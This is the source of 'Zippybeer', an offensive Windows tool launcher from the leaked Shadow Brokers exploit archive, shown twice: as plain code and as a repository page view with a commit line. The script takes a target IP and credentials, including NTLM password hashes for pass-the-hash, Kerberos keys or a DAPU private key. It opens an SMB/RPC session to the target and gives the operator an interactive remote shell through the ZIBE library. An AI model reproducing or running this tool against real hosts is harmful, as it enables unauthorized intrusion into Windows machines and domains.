shadowbrokers-exploits/windows/exploits/Zippybeer-1.0.2.py

#!/usr/bin/env python
# -*- Coding: UTF-8 -*-

import sys
import binascii
import logging
from ZIBE import logs, zbutil
from ZIBE.context_mgr import ContextManager, ZIBEException
from ZIBE.shell import ZIBEShell
from optparse import OptionParser
import os

if os.name == "nt":
    sep = ';'
else:
    sep = ":"
for v in os.environ['PATH'].split(sep):
    sys.path.append(v)

__logo__ = '''
                           .sssssssss.
                      .ssssssssssssssssss
                    sssssssssssssssssssssss
                   sssssssssssssssssssssssssss
                    @@sssssssssssssssssssssss@ss
                    |s@@@@sssssssssssssss@@@@s|s
               _____|sssss@@@@@sssss@@@@@sssss|s
             /       sssssssss@sssss@sssssssss|s
            /  .----+.ssssssss@sssss@ssssssss.|
           /  /     |...sssssss@sss@sssssss...|
          |  |      |.......sss@sss@ssss......|
          |  |      |..........s@ss@sss.......|
          |  |      |...........@ss@..........|
           \  \     |............ss@..........|
            \  ,    +...........ss@...........|
             \______ .........................|
                    | ........................|
                   /...........................\\
                  |.............................|
                     |.......................|
                         |...............|

'''


class ZIBEOptionParser(OptionParser):
    def __init__(self):
        OptionParser.__init__(self)
        self.add_option('--TargetIp', help='IP Address of Target Machine', dest="TargetIp")
        self.add_option('--TargetPort', help='Port of Target Machine', dest="TargetPort", default=445, type='int')
        self.add_option('--NetworkTimeout', help='Timeout for networking calls', dest="NetworkTimeout", default=60, type='int')
        self.add_option('--TargetEPMPort', help='Port of Target Machine', dest="TargetEPMPort", default=135, type='int')
        self.add_option('--CredentialType', help='Type of credential provided', dest="CredentialType", default="UsernamePassword")
        self.add_option('--Username', help='Account Username', dest="Username")
        self.add_option('--Credential', help='Account Password', dest="Credential")
        self.add_option('--Domain', help='Account Domain', dest="Domain", default=None)
        
        # Kerberos options
        self.add_option("--UseESRO", action="store_true", dest="UseESRO")
        self.add_option('--KerbCredentialType', help="The type of credential to use when performing the kerberos authentication", dest='KerbCredentialType')
        self.add_option('--TargetNetbiosName', help="NETBIOS name of the target computer", dest='TargetNetbiosName')
        self.add_option('--TargetDcIp', help="Domain Controller's IP address", dest='TargetDcIp')
        self.add_option('--TargetDcKerberosPort', help="Port used by the Kerberos service", dest='TargetDcKerberosPort', default=88, type='int')
        self.add_option('--TargetDcSMBPort', help="Port used by the Kerberos service", dest='TargetDcSMBPort', default=445, type='int')
        
        # DAPU Options
        self.add_option('--PrivateKey', help='DAPU Private Key', dest="PrivateKey")
        
        # Usability options
        self.add_option('--TabCompletion', help='Disable tab completion, which uses more network traffic, and may be painful over slow networks', 
                        dest="TabCompletion")
                        
try:
    sys.path.append(os.path.abspath(os.path.join(os.environ['FBDIR'], "fuzzbunch")))
    from coli import CommandlineWrapper
except Exception as e:
    print "Fuzzbunch directory not registered.  Using command line arguments"
    class CommandlineWrapper(object):
        def __call__(self, args):
            print "Called local commandlinewrapper"
            d = {}
            context = {}
            self.processParams(args, None, d, context, logs.get_logger('debug.log'))

class ZIBE(CommandlineWrapper):

    def __init__(self):
        CommandlineWrapper.__init__(self)
        self.parser = ZIBEOptionParser()
        self.opts = None
        self.args = None
        
    def __del__(self):
        pass
            
    def validateParams(self, params):
        return True
        
    def cleanup(self, flags, context, logConfig):
        return 
        
    def getID(self):
        return "b7bc209584db8d06d97dd5a6fa8b2453a93aa94a" 
        
    def processParams(self, inputs, constants, outputs, context, logConfig):
        # As a bi-product of the way we do things, we need to remove
        # the StreamHandler from the logConfig we receive
        for l in logConfig.handlers:
            if not isinstance(l, logging.FileHandler):
                logConfig.removeHandler(l)
        try:
            options, args = self.parser.parse_args(inputs) 
            
            if options.TargetIp ==  "" or options.TargetPort > 65535:
                print("IP/port are invalid")
                return
            if options.CredentialType not in ['UsernamePassword', 'PasswordHash', 'Kerberos', 'DAPU']:
                print("Invalid credential type. ")
                return
        except:
            self.parser.print_usage()
            return
        print "[+] TargetIp:            %s" % (options.TargetIp)
        print "[+] TargetPort:          %d" % (options.TargetPort)
        
        mgr = ContextManager()
        ctx = mgr.create_context("UselessContextName", options.TargetIp, options.TargetPort, options.TargetEPMPort)
        
        print "[+] CredentialType:      %s" % (options.CredentialType)
        try:
            if options.CredentialType in ['UsernamePassword', 'PasswordHash']:
                domain = options.Domain or '\\' in options.Username
                try:
                    if options.CredentialType == 'UsernamePassword' and domain:
                        ctx.provider( ctx.PROVIDER_NTLM_DOMAIN )
                        if options.Domain:
                            ctx.domain(options.Domain)
                        ctx.username( zbutil.arg_to_utf8(options.Username) )
                        ctx.password( zbutil.arg_to_utf8(options.Credential) )
                        print "[+] Username:            %s" % (zbutil.arg_to_utf8(options.Username))
                        print "[+] Credential:          %s" % (zbutil.arg_to_utf8(options.Credential))
                    elif options.CredentialType == 'UsernamePassword' and not domain:
                        ctx.provider( ctx.PROVIDER_NTLM_PLAINTEXT )
                        ctx.username( zbutil.arg_to_utf8(options.Username) )
                        ctx.password( zbutil.arg_to_utf8(options.Credential) )
                        print "[+] Username:            %s" % (zbutil.arg_to_utf8(options.Username))
                        print "[+] Credential:          %s" % (zbutil.arg_to_utf8(options.Credential))
                    elif options.CredentialType == 'PasswordHash' and domain:
                        ctx.provider( ctx.PROVIDER_NTLM_DOMAIN_HASH )
                        if options.Domain:
                            ctx.domain(options.Domain)
                        ctx.username( zbutil.arg_to_utf8(options.Username) )
                        ctx.password_hash(binascii.unhexlify(options.Credential))
                        print "[+] Username:            %s" % (zbutil.arg_to_utf8(options.Username))
                        print "[+] Password Hash:       %s" % (options.Credential)
                    elif options.CredentialType == 'PasswordHash' and not domain:
                        ctx.provider( ctx.PROVIDER_NTLM_PWHASH )
                        ctx.username( zbutil.arg_to_utf8(options.Username) )
                        ctx.password_hash(binascii.unhexlify(options.Credential))
                        print "[+] Username:            %s" % (zbutil.arg_to_utf8(options.Username))
                        print "[+] Password Hash:       %s" % (options.Credential)
                except Exception as e:
                    print("Unable to parse username or password: %s" % (e))
                    return
            elif options.CredentialType == 'Kerberos':
                if options.KerbCredentialType not in ['Password', 'PasswordHash']:
                    print("Invalid Kerberos credential type (--KerbCredentialType)")
                    return
                
                if not options.TargetDcIp or options.TargetDcIp == "":
                    print("Invalid domain controller IP address")
                    return
                if not options.TargetNetbiosName or options.TargetNetbiosName == "":
                    print("TargetNetbiosName is required")
                    return
                print "[+] TargetDcIp:          %s" % (options.TargetDcIp)
                print "[+] TargetDcPort:        %s" % (options.TargetDcKerberosPort)
                print "[+] TargetDcSMBPort:     %s" % (options.TargetDcSMBPort)
                print "[+] TargetNetbiosName:   %s" % (zbutil.arg_to_utf8(options.TargetNetbiosName))
                print "[+] KerbCredentialType:  %s" % (options.KerbCredentialType)
                print "[+] Username:            %s" % (zbutil.arg_to_utf8(options.Username))
                if options.KerbCredentialType == 'Password':
                    if options.UseESRO:
                        ctx.provider( ctx.PROVIDER_ESRO_PLAINTEXT )
                    else:
                        ctx.provider( ctx.PROVIDER_KERB_PLAINTEXT )
                    
                    ctx.password(zbutil.arg_to_utf8(options.Credential))
                    print "[+] Password:            %s" % (zbutil.arg_to_utf8(options.Credential))
                else: # Password Hash
                    if options.UseESRO:
                        ctx.provider( ctx.PROVIDER_ESRO_HASH )
                    else:
                        ctx.provider( ctx.PROVIDER_KERB_HASH )
                        
                    try:
                        ctx.password_hash(binascii.unhexlify( options.Credential ))
                        print "[+] PasswordHash:        %s" % (options.Credential)
                    except TypeError as e:
                        print("Invalid password hash.  Password must be encoded using binhex representation")
                        print(str(e))
                
                ctx.kdc_location( options.TargetDcIp, options.TargetDcKerberosPort, options.TargetDcSMBPort )
                ctx.target_name( zbutil.arg_to_utf8(options.TargetNetbiosName))
                ctx.username(zbutil.arg_to_utf8(options.Username))
                
            elif options.CredentialType == 'DAPU':
                ctx.provider( ctx.PROVIDER_DAPU )
                ctx.dp_key( binascii.unhexlify( options.PrivateKey))
            else:
                print("Invalid Authentication mechanism")
                return
        except Exception, e:
            print("Error when parsing parameters: " + str(e) )
            import traceback
            print(traceback.format_exc())
            return
            
        try:
            ctx.start_session()
        except ZIBEException, err:
            print("Failed to start ZIBE session: " + str(err) )
            return
        
        print(__logo__)
        if options.TabCompletion:
            shell = ZIBEShell(context=ctx, logger=logConfig)
        else:
            shell = ZIBEShell(context=ctx, completekey=None, logger=logConfig)
        
        shell.cmdloop(intro="ZIBE Interactive Shell")
        mgr.release_context(ctx)
        
if __name__ == "__main__":
    z = ZIBE()
    z(sys.argv[1:])
Inital commit of Shadowbrokers 'Lost in Translation' release 2017-04-14 04:45:07 -05:00			`#!/usr/bin/env python`
			`# -- Coding: UTF-8 --`

			`import sys`
			`import binascii`
			`import logging`
			`from ZIBE import logs, zbutil`
			`from ZIBE.context_mgr import ContextManager, ZIBEException`
			`from ZIBE.shell import ZIBEShell`
			`from optparse import OptionParser`
			`import os`

			`if os.name == "nt":`
			`sep = ';'`
			`else:`
			`sep = ":"`
			`for v in os.environ['PATH'].split(sep):`
			`sys.path.append(v)`

			`__logo__ = '''`
			`.sssssssss.`
			`.ssssssssssssssssss`
			`sssssssssssssssssssssss`
			`sssssssssssssssssssssssssss`
			`@@sssssssssssssssssssssss@ss`
			`\|s@@@@sssssssssssssss@@@@s\|s`
			`_____\|sssss@@@@@sssss@@@@@sssss\|s`
			`/ sssssssss@sssss@sssssssss\|s`
			`/ .----+.ssssssss@sssss@ssssssss.\|`
			`/ / \|...sssssss@sss@sssssss...\|`
			`\| \| \|.......sss@sss@ssss......\|`
			`\| \| \|..........s@ss@sss.......\|`
			`\| \| \|...........@ss@..........\|`
			`\ \ \|............ss@..........\|`
			`\ , +...........ss@...........\|`
			`\______ .........................\|`
			`\| ........................\|`
			`/...........................\\`
			`\|.............................\|`
			`\|.......................\|`
			`\|...............\|`

			`'''`


			`class ZIBEOptionParser(OptionParser):`
			`def __init__(self):`
			`OptionParser.__init__(self)`
			`self.add_option('--TargetIp', help='IP Address of Target Machine', dest="TargetIp")`
			`self.add_option('--TargetPort', help='Port of Target Machine', dest="TargetPort", default=445, type='int')`
			`self.add_option('--NetworkTimeout', help='Timeout for networking calls', dest="NetworkTimeout", default=60, type='int')`
			`self.add_option('--TargetEPMPort', help='Port of Target Machine', dest="TargetEPMPort", default=135, type='int')`
			`self.add_option('--CredentialType', help='Type of credential provided', dest="CredentialType", default="UsernamePassword")`
			`self.add_option('--Username', help='Account Username', dest="Username")`
			`self.add_option('--Credential', help='Account Password', dest="Credential")`
			`self.add_option('--Domain', help='Account Domain', dest="Domain", default=None)`

			`# Kerberos options`
			`self.add_option("--UseESRO", action="store_true", dest="UseESRO")`
			`self.add_option('--KerbCredentialType', help="The type of credential to use when performing the kerberos authentication", dest='KerbCredentialType')`
			`self.add_option('--TargetNetbiosName', help="NETBIOS name of the target computer", dest='TargetNetbiosName')`
			`self.add_option('--TargetDcIp', help="Domain Controller's IP address", dest='TargetDcIp')`
			`self.add_option('--TargetDcKerberosPort', help="Port used by the Kerberos service", dest='TargetDcKerberosPort', default=88, type='int')`
			`self.add_option('--TargetDcSMBPort', help="Port used by the Kerberos service", dest='TargetDcSMBPort', default=445, type='int')`

			`# DAPU Options`
			`self.add_option('--PrivateKey', help='DAPU Private Key', dest="PrivateKey")`

			`# Usability options`
			`self.add_option('--TabCompletion', help='Disable tab completion, which uses more network traffic, and may be painful over slow networks',`
			`dest="TabCompletion")`

			`try:`
			`sys.path.append(os.path.abspath(os.path.join(os.environ['FBDIR'], "fuzzbunch")))`
			`from coli import CommandlineWrapper`
			`except Exception as e:`
			`print "Fuzzbunch directory not registered. Using command line arguments"`
			`class CommandlineWrapper(object):`
			`def __call__(self, args):`
			`print "Called local commandlinewrapper"`
			`d = {}`
			`context = {}`
			`self.processParams(args, None, d, context, logs.get_logger('debug.log'))`

			`class ZIBE(CommandlineWrapper):`

			`def __init__(self):`
			`CommandlineWrapper.__init__(self)`
			`self.parser = ZIBEOptionParser()`
			`self.opts = None`
			`self.args = None`

			`def __del__(self):`
			`pass`

			`def validateParams(self, params):`
			`return True`

			`def cleanup(self, flags, context, logConfig):`
			`return`

			`def getID(self):`
			`return "b7bc209584db8d06d97dd5a6fa8b2453a93aa94a"`

			`def processParams(self, inputs, constants, outputs, context, logConfig):`
			`# As a bi-product of the way we do things, we need to remove`
			`# the StreamHandler from the logConfig we receive`
			`for l in logConfig.handlers:`
			`if not isinstance(l, logging.FileHandler):`
			`logConfig.removeHandler(l)`
			`try:`
			`options, args = self.parser.parse_args(inputs)`

			`if options.TargetIp == "" or options.TargetPort > 65535:`
			`print("IP/port are invalid")`
			`return`
			`if options.CredentialType not in ['UsernamePassword', 'PasswordHash', 'Kerberos', 'DAPU']:`
			`print("Invalid credential type. ")`
			`return`
			`except:`
			`self.parser.print_usage()`
			`return`
			`print "[+] TargetIp: %s" % (options.TargetIp)`
			`print "[+] TargetPort: %d" % (options.TargetPort)`

			`mgr = ContextManager()`
			`ctx = mgr.create_context("UselessContextName", options.TargetIp, options.TargetPort, options.TargetEPMPort)`

			`print "[+] CredentialType: %s" % (options.CredentialType)`
			`try:`
			`if options.CredentialType in ['UsernamePassword', 'PasswordHash']:`
			`domain = options.Domain or '\\' in options.Username`
			`try:`
			`if options.CredentialType == 'UsernamePassword' and domain:`
			`ctx.provider( ctx.PROVIDER_NTLM_DOMAIN )`
			`if options.Domain:`
			`ctx.domain(options.Domain)`
			`ctx.username( zbutil.arg_to_utf8(options.Username) )`
			`ctx.password( zbutil.arg_to_utf8(options.Credential) )`
			`print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))`
			`print "[+] Credential: %s" % (zbutil.arg_to_utf8(options.Credential))`
			`elif options.CredentialType == 'UsernamePassword' and not domain:`
			`ctx.provider( ctx.PROVIDER_NTLM_PLAINTEXT )`
			`ctx.username( zbutil.arg_to_utf8(options.Username) )`
			`ctx.password( zbutil.arg_to_utf8(options.Credential) )`
			`print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))`
			`print "[+] Credential: %s" % (zbutil.arg_to_utf8(options.Credential))`
			`elif options.CredentialType == 'PasswordHash' and domain:`
			`ctx.provider( ctx.PROVIDER_NTLM_DOMAIN_HASH )`
			`if options.Domain:`
			`ctx.domain(options.Domain)`
			`ctx.username( zbutil.arg_to_utf8(options.Username) )`
			`ctx.password_hash(binascii.unhexlify(options.Credential))`
			`print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))`
			`print "[+] Password Hash: %s" % (options.Credential)`
			`elif options.CredentialType == 'PasswordHash' and not domain:`
			`ctx.provider( ctx.PROVIDER_NTLM_PWHASH )`
			`ctx.username( zbutil.arg_to_utf8(options.Username) )`
			`ctx.password_hash(binascii.unhexlify(options.Credential))`
			`print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))`
			`print "[+] Password Hash: %s" % (options.Credential)`
			`except Exception as e:`
			`print("Unable to parse username or password: %s" % (e))`
			`return`
			`elif options.CredentialType == 'Kerberos':`
			`if options.KerbCredentialType not in ['Password', 'PasswordHash']:`
			`print("Invalid Kerberos credential type (--KerbCredentialType)")`
			`return`

			`if not options.TargetDcIp or options.TargetDcIp == "":`
			`print("Invalid domain controller IP address")`
			`return`
			`if not options.TargetNetbiosName or options.TargetNetbiosName == "":`
			`print("TargetNetbiosName is required")`
			`return`
			`print "[+] TargetDcIp: %s" % (options.TargetDcIp)`
			`print "[+] TargetDcPort: %s" % (options.TargetDcKerberosPort)`
			`print "[+] TargetDcSMBPort: %s" % (options.TargetDcSMBPort)`
			`print "[+] TargetNetbiosName: %s" % (zbutil.arg_to_utf8(options.TargetNetbiosName))`
			`print "[+] KerbCredentialType: %s" % (options.KerbCredentialType)`
			`print "[+] Username: %s" % (zbutil.arg_to_utf8(options.Username))`
			`if options.KerbCredentialType == 'Password':`
			`if options.UseESRO:`
			`ctx.provider( ctx.PROVIDER_ESRO_PLAINTEXT )`
			`else:`
			`ctx.provider( ctx.PROVIDER_KERB_PLAINTEXT )`

			`ctx.password(zbutil.arg_to_utf8(options.Credential))`
			`print "[+] Password: %s" % (zbutil.arg_to_utf8(options.Credential))`
			`else: # Password Hash`
			`if options.UseESRO:`
			`ctx.provider( ctx.PROVIDER_ESRO_HASH )`
			`else:`
			`ctx.provider( ctx.PROVIDER_KERB_HASH )`

			`try:`
			`ctx.password_hash(binascii.unhexlify( options.Credential ))`
			`print "[+] PasswordHash: %s" % (options.Credential)`
			`except TypeError as e:`
			`print("Invalid password hash. Password must be encoded using binhex representation")`
			`print(str(e))`

			`ctx.kdc_location( options.TargetDcIp, options.TargetDcKerberosPort, options.TargetDcSMBPort )`
			`ctx.target_name( zbutil.arg_to_utf8(options.TargetNetbiosName))`
			`ctx.username(zbutil.arg_to_utf8(options.Username))`

			`elif options.CredentialType == 'DAPU':`
			`ctx.provider( ctx.PROVIDER_DAPU )`
			`ctx.dp_key( binascii.unhexlify( options.PrivateKey))`
			`else:`
			`print("Invalid Authentication mechanism")`
			`return`
			`except Exception, e:`
			`print("Error when parsing parameters: " + str(e) )`
			`import traceback`
			`print(traceback.format_exc())`
			`return`

			`try:`
			`ctx.start_session()`
			`except ZIBEException, err:`
			`print("Failed to start ZIBE session: " + str(err) )`
			`return`

			`print(__logo__)`
			`if options.TabCompletion:`
			`shell = ZIBEShell(context=ctx, logger=logConfig)`
			`else:`
			`shell = ZIBEShell(context=ctx, completekey=None, logger=logConfig)`

			`shell.cmdloop(intro="ZIBE Interactive Shell")`
			`mgr.release_context(ctx)`

			`if __name__ == "__main__":`
			`z = ZIBE()`
			`z(sys.argv[1:])`